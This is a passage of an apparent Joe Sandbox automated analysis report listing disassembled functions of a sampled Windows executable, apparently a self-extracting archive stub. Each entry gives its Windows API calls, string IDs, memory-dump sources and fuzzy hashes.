                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 2148572870-0
                                                                                    • Opcode ID: 3d209f8a6c146f4c67c123c56176547767cfe09d225941f7bcd23ef3b93de478
                                                                                    • Instruction ID: 4aa132ee055395c06dc9193d3062c73d24930ee522f6128d5df3a8b76f7b8c6d
                                                                                    • Opcode Fuzzy Hash: 3d209f8a6c146f4c67c123c56176547767cfe09d225941f7bcd23ef3b93de478
                                                                                    • Instruction Fuzzy Hash: 66F03C72A01219BBCB206BA5EC4CDDB7F6EEF42B91F108111B50AD2061D678CA46C7B4
                                                                                    Function 0073A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0073A699: GetDC.USER32(00000000), ref: 0073A69D
                                                                                      • Part of subcall function 0073A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0073A6A8
                                                                                      • Part of subcall function 0073A699: ReleaseDC.USER32(00000000,00000000), ref: 0073A6B3
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0073A83C
                                                                                      • Part of subcall function 0073AAC9: GetDC.USER32(00000000), ref: 0073AAD2
                                                                                      • Part of subcall function 0073AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0073AB01
                                                                                      • Part of subcall function 0073AAC9: ReleaseDC.USER32(00000000,?), ref: 0073AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID: "s$($As
                                                                                    • API String ID: 1061551593-951805127
                                                                                    • Opcode ID: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                    • Instruction ID: 6c5758b691f93ab1e0cf860a829ac206e820a946957ead690f1bf30e0ad4c46a
                                                                                    • Opcode Fuzzy Hash: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                    • Instruction Fuzzy Hash: 60910271208744AFE711DF25C845A6BBBE9FFC8701F00891EF59AD3221DB74A945CB62
                                                                                    Function 0072C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                      • Part of subcall function 0072B92D: _wcsrchr.LIBVCRUNTIME ref: 0072B944
                                                                                    • _wcslen.LIBCMT ref: 0072C197
                                                                                    • _wcslen.LIBCMT ref: 0072C1DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                    • String ID: .exe$.rar$.sfx
                                                                                    • API String ID: 3513545583-31770016
                                                                                    • Opcode ID: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                    • Instruction ID: ca86f43ce5b4a889c75ace76f09141be1251c6c70133f6cbe4cafb05679f7eb6
                                                                                    • Opcode Fuzzy Hash: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                    • Instruction Fuzzy Hash: E4417962100375D6D733AF34A856A7E73A8EF61744F20050EF8C26B082EB6D5E91C391
                                                                                    Function 0072BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0072BB27
                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0072A275,?,?,00000800,?,0072A23A,?,0072755C), ref: 0072BBC5
                                                                                    • _wcslen.LIBCMT ref: 0072BC3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                    • String ID: UNC$\\?\
                                                                                    • API String ID: 3341907918-253988292
                                                                                    • Opcode ID: 5974f99e3f110f15bdc3c4f93cb61eaf977d7b7b38ed2e1eab592037b7a19911
                                                                                    • Instruction ID: e1fea8886560c4ce36eb51f0266c1ef0e7aff4dea10081cef7b476962c505a5f
                                                                                    • Opcode Fuzzy Hash: 5974f99e3f110f15bdc3c4f93cb61eaf977d7b7b38ed2e1eab592037b7a19911
                                                                                    • Instruction Fuzzy Hash: D641B671400225E6DF21AF20EC06EEE7769AF45391F148466F855A3151EBBCEED0CBB0
                                                                                    Function 0073CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0073CD84
                                                                                      • Part of subcall function 0073AF98: _wcschr.LIBVCRUNTIME ref: 0073B033
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr$CompareString
                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                    • API String ID: 69343711-3358265660
                                                                                    • Opcode ID: 0acbaa8895bf37ac5ff6e78dc1573175280d3eb2694427768e23473c0ddea1a3
                                                                                    • Instruction ID: b3a9d61500b7ad15aa3d8ca3d849bf673da24b525ab13bcbffd99b889f2f33c8
                                                                                    • Opcode Fuzzy Hash: 0acbaa8895bf37ac5ff6e78dc1573175280d3eb2694427768e23473c0ddea1a3
                                                                                    • Instruction Fuzzy Hash: F2316772940219AAEF26DB50DC45EEE73BCEB14350F408166F905E7181EBB89E848FA1
                                                                                    Function 0073AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0073AAD2
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0073AB01
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0073AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease
                                                                                    • String ID: -s$7s
                                                                                    • API String ID: 1429681911-2962036938
                                                                                    • Opcode ID: 5088eac68b580f4d0f78089418f396672143ba5239a93a535dd9eeb862e9e60a
                                                                                    • Instruction ID: de62a8db3bce6b431e0c40f28325344069baaad552314300afe9d26721a49d3a
                                                                                    • Opcode Fuzzy Hash: 5088eac68b580f4d0f78089418f396672143ba5239a93a535dd9eeb862e9e60a
                                                                                    • Instruction Fuzzy Hash: BC214A72148304FFD3009FA8DC48E6FBFEAFB89B51F204819FA45D2120D7399A148B66
                                                                                    Function 0072B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0072B9B8
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0072B9D6
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0072B9E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                    • String ID: %c:\
                                                                                    • API String ID: 525462905-3142399695
                                                                                    • Opcode ID: 320310f4162e4fb28d337e9b505fb1f958e0043c21c931165a166ccc1df27727
                                                                                    • Instruction ID: 7d393790a781042ce427cdd60dfa83bf6d40e299a3237ca2e9b88bdcdfbdc07f
                                                                                    • Opcode Fuzzy Hash: 320310f4162e4fb28d337e9b505fb1f958e0043c21c931165a166ccc1df27727
                                                                                    • Instruction Fuzzy Hash: 1D01F563514321A99A306B35AC4AD6BB7ACEE95770B50840AF584D6082FB28F89483B1
                                                                                    Function 0073B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073B2BE
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0073B2D6
                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0073B304
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: GETPASSWORD1$xzw
                                                                                    • API String ID: 445417207-3717932900
                                                                                    • Opcode ID: b5aa76b9f5837434c5c96ec38d027e68530d2fbdae7f612e3bd3d8928b0e83cc
                                                                                    • Instruction ID: bada34eedb97f84da631fd3d5222949dfdde776cfc7202a5978394aac8ee8fa6
                                                                                    • Opcode Fuzzy Hash: b5aa76b9f5837434c5c96ec38d027e68530d2fbdae7f612e3bd3d8928b0e83cc
                                                                                    • Instruction Fuzzy Hash: 7011C432940128B6EB219A78AC49FFF376DFF19B40F104120FB46B61C1C7ACAA4597A1
                                                                                    Function 0073B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadBitmapW.USER32(00000065), ref: 0073B6ED
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0073B712
                                                                                    • DeleteObject.GDI32(00000000), ref: 0073B744
                                                                                    • DeleteObject.GDI32(00000000), ref: 0073B767
                                                                                      • Part of subcall function 0073A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0073B73D,00000066), ref: 0073A6D5
                                                                                      • Part of subcall function 0073A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A6EC
                                                                                      • Part of subcall function 0073A6C2: LoadResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A703
                                                                                      • Part of subcall function 0073A6C2: LockResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A712
                                                                                      • Part of subcall function 0073A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A72D
                                                                                      • Part of subcall function 0073A6C2: GlobalLock.KERNEL32(00000000), ref: 0073A73E
                                                                                      • Part of subcall function 0073A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0073A762
                                                                                      • Part of subcall function 0073A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0073A7A7
                                                                                      • Part of subcall function 0073A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0073A7C6
                                                                                      • Part of subcall function 0073A6C2: GlobalFree.KERNEL32(00000000), ref: 0073A7CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                    • String ID: ]
                                                                                    • API String ID: 1797374341-3352871620
                                                                                    • Opcode ID: 5affc922d2c0dbeb328065599076f7b71a6419804e16b3419af644fbb3757859
                                                                                    • Instruction ID: 9f81cf5a63325b7ca97ef16c9774b737556288cd2b3630b2f1c10bf9eb7869a0
                                                                                    • Opcode Fuzzy Hash: 5affc922d2c0dbeb328065599076f7b71a6419804e16b3419af644fbb3757859
                                                                                    • Instruction Fuzzy Hash: 7801C436540215B7E71277789C0EABF7ABAEBC0B52F180012FA40B7293DF6D8D054262
                                                                                    Function 0073D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073D64B
                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0073D661
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0073D675
                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0073D684
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 445417207-3299779563
                                                                                    • Opcode ID: 75f3da9f970d1f7ce69907ec39e162e2be7f4b9390cd056173fb8e500e704a78
                                                                                    • Instruction ID: a6d7eef972c89d7777944bcca36c5e2f87e3a1590987b249b633b293c78989be
                                                                                    • Opcode Fuzzy Hash: 75f3da9f970d1f7ce69907ec39e162e2be7f4b9390cd056173fb8e500e704a78
                                                                                    • Instruction Fuzzy Hash: 2801F533684214FAF2214F68AE0EF56776EBB9AB81F114010F205A60D2C7AE9D048779
                                                                                    Function 00747E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00747E24,00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002), ref: 00747E93
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00747EA6
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00747E24,00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002), ref: 00747EC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 44383d69bc0d85a89ed4db1c85a1bdb4ff118ef30939510042f01c120822933a
                                                                                    • Instruction ID: c701a148ddc43af93b076dd2714ba2a10f064b35a9aac453dc8229b1013db192
                                                                                    • Opcode Fuzzy Hash: 44383d69bc0d85a89ed4db1c85a1bdb4ff118ef30939510042f01c120822933a
                                                                                    • Instruction Fuzzy Hash: 1FF04471900318BBDB159BA0DC09BDEBFB5EB44752F0081A9F805A2160DBB89F44CA94
                                                                                    Function 0072F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                      • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0072F2E4
                                                                                    • GetProcAddress.KERNEL32(007681C8,CryptUnprotectMemory), ref: 0072F2F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                    • API String ID: 2141747552-1753850145
                                                                                    • Opcode ID: fa8540f7b2d62d1d64c2fd06b7fc514077f8599005d01fb5008e6da27448152c
                                                                                    • Instruction ID: 4d045396f4a82b161db1f5c2b28e75196cc4ad90740b069505a708bccd966a78
                                                                                    • Opcode Fuzzy Hash: fa8540f7b2d62d1d64c2fd06b7fc514077f8599005d01fb5008e6da27448152c
                                                                                    • Instruction Fuzzy Hash: 69E086B19107119ED7219F38A84DB827AE4AF04742F14C82DF4DA936A1DAFCD5448B50
                                                                                    Function 00742BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
